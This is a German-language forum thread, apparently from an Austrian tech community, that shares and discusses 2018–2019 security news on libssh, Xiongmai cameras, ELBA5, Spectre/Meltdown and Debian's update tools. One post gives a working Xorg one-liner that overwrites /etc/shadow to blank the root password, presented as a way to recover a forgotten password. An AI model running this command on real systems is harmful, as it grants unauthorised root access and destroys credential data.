Aktuelle Sicherheitslücken

Hansmaulwurf

u wot m8?

Registered: Apr 2005
Location: VBG
Posts: 5639

17.10.2018 - 14:05

Trivial authentication bypass in libssh leaves servers wide open

How many servers have been affected remains unclear.

Link: arstechnica.com

Fetter libssh Bug, openssh und github nicht betroffen.

Cobase

Mr. RAM

Registered: Jun 2001
Location: Linz
Posts: 17885

17.10.2018 - 14:18

Zitat aus einem Post von mr.nice.
Offen wie ein Scheunentor: Millionen Überwachungskameras im Netz angreifbar

Alleine in Deutschland sind 1,3 Millionen Kameras verschiedenster Hersteller auf Grund von verbauter Technik der Firma Xiongmai einfach zu kapern.

Link: www.heise.de

Die Geräte-ID für den cloud Zugriff wird aus der MAC-Adresse des Geräts abgeleitet und ist nicht zufällig genug, es gibt hardgecodete default credentials die nicht geändert werden können, das verwendete hashing Verfahren ist ein bereits gebrochenes, die firmware ist unsigniert..

SEC Consult vermutet verwundbare Xiongmai-Technik unter anderem in den Geräten der folgenden Firmen: 9Trading, Abowone, AHWVSE, ANRAN, ASECAM, Autoeye, AZISHN, A-ZONE, BESDER/BESDERSEC, BESSKY, Bestmo, BFMore, BOAVISION, BULWARK, CANAVIS, CWH, DAGRO, datocctv, DEFEWAY, digoo, DiySecurityCameraWorld, DONPHIA, ENKLOV, ESAMACT, ESCAM, EVTEVISION, Fayele, FLOUREON , Funi, GADINAN, GARUNK, HAMROL, HAMROLTE, Highfly, Hiseeu, HISVISION, HMQC, IHOMEGUARD, ISSEUSEE, iTooner, JENNOV, Jooan, Jshida, JUESENWDM, JUFENG, JZTEK, KERUI, KKMOON, KONLEN, Kopda, Lenyes, LESHP, LEVCOECAM, LINGSEE, LOOSAFE, MIEBUL, MISECU, Nextrend, OEM, OLOEY, OUERTECH, QNTSQ, SACAM, SANNCE, SANSCO, SecTec, Shell film, Sifvision, sifsecurityvision, smar, SMTSEC, SSICON, SUNBA, Sunivision, Susikum, TECBOX, Techage, Techege, TianAnXun, TMEZON, TVPSii, Unique Vision, unitoptek, USAFEQLO, VOLDRELI, Westmile, Westshine, Wistino, Witrue, WNK Security Technology, WOFEA, WOSHIJIA, WUSONLUSAN, XIAO MA, XinAnX, xloongx, YiiSPO, YUCHENG, YUNSYE, zclever, zilnk, ZJUXIN, zmodo und ZRHUNTER.

Und die Heisl von Heise geben MAL WIEDER keinen Link zur Quelle an: https://www.sec-consult.com/blog/20...xmeye-p2p-coud/

Smut

takeover & ether

Registered: Feb 2003
Location: VIE
Posts: 16632

17.10.2018 - 18:04

Zitat aus einem Post von Hansmaulwurf
Fetter libssh Bug, openssh und github nicht betroffen.

generell ist hier eher weniger davon betroffen da libssh (nicht libssh2) eher selten zum einsatz kommt.
synology dürfte es erwischt haben. sftp/scp implementierungen würde ich auch prüfen.

hth

t3mp

I Love Gasoline

Registered: Mar 2003
Location: upstairs
Posts: 6254

17.10.2018 - 19:45

Vor allem server-mode fällt mir atm nichts ein, clients sind nicht betroffen.

Kirby

0x19

Registered: Jun 2017
Location: Lesachtal/Villac..
Posts: 829

02.11.2018 - 13:14

wenn mal jemand das root passwort vergessen hat und Xorg aufm linux rechner hat -->
"
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1
"

COLOSSUS

Administrator
Frickler

Registered: Dec 2000
Location: ~
Posts: 11901

02.11.2018 - 15:29

Problematisch nur dann, wenn Xorg mit dem SUID-Bit und Owner root installiert ist. Das ist heute nicht mehr oft der Fall.

muene

Addicted

Registered: Jan 2004
Location: @Home
Posts: 430

22.11.2018 - 09:23

Falls hier jemand beruflich mit ELBA zu tun hat:

0-Day in ELBA5’s Network Installation: Overtaking your company’s bank account » #bogner.sh

Link: bogner.sh

semteX

Risen from the banned

Registered: Oct 2002
Location: Pre
Posts: 14340

22.11.2018 - 09:44

warum is das ding ein zero day, wenns das update seit über nehm jahr gibt?

Smut

takeover & ether

Registered: Feb 2003
Location: VIE
Posts: 16632

22.11.2018 - 09:54

ältere Versionen sind verwundbar und es ist nicht gesagt dass nur latest supported ist.
Jedenfalls gibt es kaum kritischere Lücken in Software bzw. it services.

semteX

Risen from the banned

Registered: Oct 2002
Location: Pre
Posts: 14340

22.11.2018 - 10:02

Nein sorry, versteh ich ned. ELBA5 als supported version hat den patschn, ELBA5 is gepatched. Zero Day bedeutet dass der Exploit veröffentlicht wird bevor der Hersteller informiert ist bzw die Software patchen kann. Hier verging ein Jahr zwischn reporting und release (incl patch), was im Gegensatz zu den üblichen 3 Monaten von project zero eh fürstlich war

Ich geh davon aus, dass ältere ungepatchte Versionen nicht mehr supported werden, ansonsten könntest jetzt zampackn und heim gehen... Vor allem weil das ja kein "release in anger" war sondern in enger kooperation mit dem elba team..

aber ja, lücke die du vollautomatisch ausnützen kannst wenn du weißt wo du im intranet die instanzen stehen... schlimmer wirds nimmer. Und geiler find vom Herrn Bogner!

Smut

takeover & ether

Registered: Feb 2003
Location: VIE
Posts: 16632

22.11.2018 - 10:28

Stimmt eh. Über Zero day kannst streiten.
Er hat den zero day gefunden jedoch aufgrund von responsible disclosure nicht darüber berichtet. Zuletzt gab es nur die ankündigung dass etwas gefunden wurde und es demnächst veröffentlicht wird.

Kirby

0x19

Registered: Jun 2017
Location: Lesachtal/Villac..
Posts: 829

22.11.2018 - 11:35

Finds ja auch immer geil wiese eine Lücke schließen und dann mehrere wieder aufgehen.

Genau wie bei Spectre/Meltdown.

gepatched und wieder 5 poc exploit gefunden

Smut

takeover & ether

Registered: Feb 2003
Location: VIE
Posts: 16632

22.11.2018 - 11:40

Naja. Specter meltdown ist im wesentlichen ein Architekturproblem und ohne permission Management des caches wirst das nicht hinbekommen - oder halt ganz stark auf Performance verzichten.
Kann man also nicht pauschal sagen dass fixes neue Lücken aufreißen.

Kirby

0x19

Registered: Jun 2017
Location: Lesachtal/Villac..
Posts: 829

22.11.2018 - 12:06

Stimmt pauschal sagen dass fixes neue Lücken aufreisen kann man nicht.

Jedoch sollte man immer davon ausgehen das kein system sicher ist und man eig immeriwie zugriff drauf bekommt.

wergor

connoisseur de mimi

Registered: Jul 2005
Location: graz
Posts: 4027

22.01.2019 - 18:57

Kritische Sicherheitslücke in Debians Update-Tools

Debian-basierte Linux-Systeme weisen eine Sicherheitslücke auf, über die Angreifer das System während des Einspielens von Sicherheits-Updates kapern könnten.

Link: www.heise.de

Hansmaulwurf u wot m8? Registered: Apr 2005 Location: VBG Posts: 5639	17.10.2018 - 14:05 Trivial authentication bypass in libssh leaves servers wide open How many servers have been affected remains unclear. Link: arstechnica.com Fetter libssh Bug, openssh und github nicht betroffen.
Cobase Mr. RAM Registered: Jun 2001 Location: Linz Posts: 17885	17.10.2018 - 14:18 Zitat aus einem Post von mr.nice. Offen wie ein Scheunentor: Millionen Überwachungskameras im Netz angreifbar Alleine in Deutschland sind 1,3 Millionen Kameras verschiedenster Hersteller auf Grund von verbauter Technik der Firma Xiongmai einfach zu kapern. Link: www.heise.de Die Geräte-ID für den cloud Zugriff wird aus der MAC-Adresse des Geräts abgeleitet und ist nicht zufällig genug, es gibt hardgecodete default credentials die nicht geändert werden können, das verwendete hashing Verfahren ist ein bereits gebrochenes, die firmware ist unsigniert.. SEC Consult vermutet verwundbare Xiongmai-Technik unter anderem in den Geräten der folgenden Firmen: 9Trading, Abowone, AHWVSE, ANRAN, ASECAM, Autoeye, AZISHN, A-ZONE, BESDER/BESDERSEC, BESSKY, Bestmo, BFMore, BOAVISION, BULWARK, CANAVIS, CWH, DAGRO, datocctv, DEFEWAY, digoo, DiySecurityCameraWorld, DONPHIA, ENKLOV, ESAMACT, ESCAM, EVTEVISION, Fayele, FLOUREON , Funi, GADINAN, GARUNK, HAMROL, HAMROLTE, Highfly, Hiseeu, HISVISION, HMQC, IHOMEGUARD, ISSEUSEE, iTooner, JENNOV, Jooan, Jshida, JUESENWDM, JUFENG, JZTEK, KERUI, KKMOON, KONLEN, Kopda, Lenyes, LESHP, LEVCOECAM, LINGSEE, LOOSAFE, MIEBUL, MISECU, Nextrend, OEM, OLOEY, OUERTECH, QNTSQ, SACAM, SANNCE, SANSCO, SecTec, Shell film, Sifvision, sifsecurityvision, smar, SMTSEC, SSICON, SUNBA, Sunivision, Susikum, TECBOX, Techage, Techege, TianAnXun, TMEZON, TVPSii, Unique Vision, unitoptek, USAFEQLO, VOLDRELI, Westmile, Westshine, Wistino, Witrue, WNK Security Technology, WOFEA, WOSHIJIA, WUSONLUSAN, XIAO MA, XinAnX, xloongx, YiiSPO, YUCHENG, YUNSYE, zclever, zilnk, ZJUXIN, zmodo und ZRHUNTER. Und die Heisl von Heise geben MAL WIEDER keinen Link zur Quelle an: https://www.sec-consult.com/blog/20...xmeye-p2p-coud/
Smut takeover & ether Registered: Feb 2003 Location: VIE Posts: 16632	17.10.2018 - 18:04 Zitat aus einem Post von Hansmaulwurf Fetter libssh Bug, openssh und github nicht betroffen. generell ist hier eher weniger davon betroffen da libssh (nicht libssh2) eher selten zum einsatz kommt. synology dürfte es erwischt haben. sftp/scp implementierungen würde ich auch prüfen. hth
t3mp I Love Gasoline Registered: Mar 2003 Location: upstairs Posts: 6254	17.10.2018 - 19:45 Vor allem server-mode fällt mir atm nichts ein, clients sind nicht betroffen.
Kirby 0x19 Registered: Jun 2017 Location: Lesachtal/Villac.. Posts: 829	02.11.2018 - 13:14 wenn mal jemand das root passwort vergessen hat und Xorg aufm linux rechner hat --> " cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1 "
COLOSSUS Administrator Frickler Registered: Dec 2000 Location: ~ Posts: 11901	02.11.2018 - 15:29 Problematisch nur dann, wenn Xorg mit dem SUID-Bit und Owner root installiert ist. Das ist heute nicht mehr oft der Fall.
muene Addicted Registered: Jan 2004 Location: @Home Posts: 430	22.11.2018 - 09:23 Falls hier jemand beruflich mit ELBA zu tun hat: 0-Day in ELBA5’s Network Installation: Overtaking your company’s bank account » #bogner.sh Link: bogner.sh
semteX Risen from the banned Registered: Oct 2002 Location: Pre Posts: 14340	22.11.2018 - 09:44 warum is das ding ein zero day, wenns das update seit über nehm jahr gibt?
Smut takeover & ether Registered: Feb 2003 Location: VIE Posts: 16632	22.11.2018 - 09:54 ältere Versionen sind verwundbar und es ist nicht gesagt dass nur latest supported ist. Jedenfalls gibt es kaum kritischere Lücken in Software bzw. it services.
semteX Risen from the banned Registered: Oct 2002 Location: Pre Posts: 14340	22.11.2018 - 10:02 Nein sorry, versteh ich ned. ELBA5 als supported version hat den patschn, ELBA5 is gepatched. Zero Day bedeutet dass der Exploit veröffentlicht wird bevor der Hersteller informiert ist bzw die Software patchen kann. Hier verging ein Jahr zwischn reporting und release (incl patch), was im Gegensatz zu den üblichen 3 Monaten von project zero eh fürstlich war Ich geh davon aus, dass ältere ungepatchte Versionen nicht mehr supported werden, ansonsten könntest jetzt zampackn und heim gehen... Vor allem weil das ja kein "release in anger" war sondern in enger kooperation mit dem elba team.. aber ja, lücke die du vollautomatisch ausnützen kannst wenn du weißt wo du im intranet die instanzen stehen... schlimmer wirds nimmer. Und geiler find vom Herrn Bogner!
Smut takeover & ether Registered: Feb 2003 Location: VIE Posts: 16632	22.11.2018 - 10:28 Stimmt eh. Über Zero day kannst streiten. Er hat den zero day gefunden jedoch aufgrund von responsible disclosure nicht darüber berichtet. Zuletzt gab es nur die ankündigung dass etwas gefunden wurde und es demnächst veröffentlicht wird.
Kirby 0x19 Registered: Jun 2017 Location: Lesachtal/Villac.. Posts: 829	22.11.2018 - 11:35 Finds ja auch immer geil wiese eine Lücke schließen und dann mehrere wieder aufgehen. Genau wie bei Spectre/Meltdown. gepatched und wieder 5 poc exploit gefunden
Smut takeover & ether Registered: Feb 2003 Location: VIE Posts: 16632	22.11.2018 - 11:40 Naja. Specter meltdown ist im wesentlichen ein Architekturproblem und ohne permission Management des caches wirst das nicht hinbekommen - oder halt ganz stark auf Performance verzichten. Kann man also nicht pauschal sagen dass fixes neue Lücken aufreißen.
Kirby 0x19 Registered: Jun 2017 Location: Lesachtal/Villac.. Posts: 829	22.11.2018 - 12:06 Stimmt pauschal sagen dass fixes neue Lücken aufreisen kann man nicht. Jedoch sollte man immer davon ausgehen das kein system sicher ist und man eig immeriwie zugriff drauf bekommt.
wergor connoisseur de mimi Registered: Jul 2005 Location: graz Posts: 4027	22.01.2019 - 18:57 Kritische Sicherheitslücke in Debians Update-Tools Debian-basierte Linux-Systeme weisen eine Sicherheitslücke auf, über die Angreifer das System während des Einspielens von Sicherheits-Updates kapern könnten. Link: www.heise.de

Aktuelle Sicherheitslücken

Forum Index > Software > Applications, Apps & Drivers

Hansmaulwurf

Cobase

Smut

t3mp

Kirby

COLOSSUS

muene

semteX

Smut

semteX

Smut

Kirby

Smut

Kirby

wergor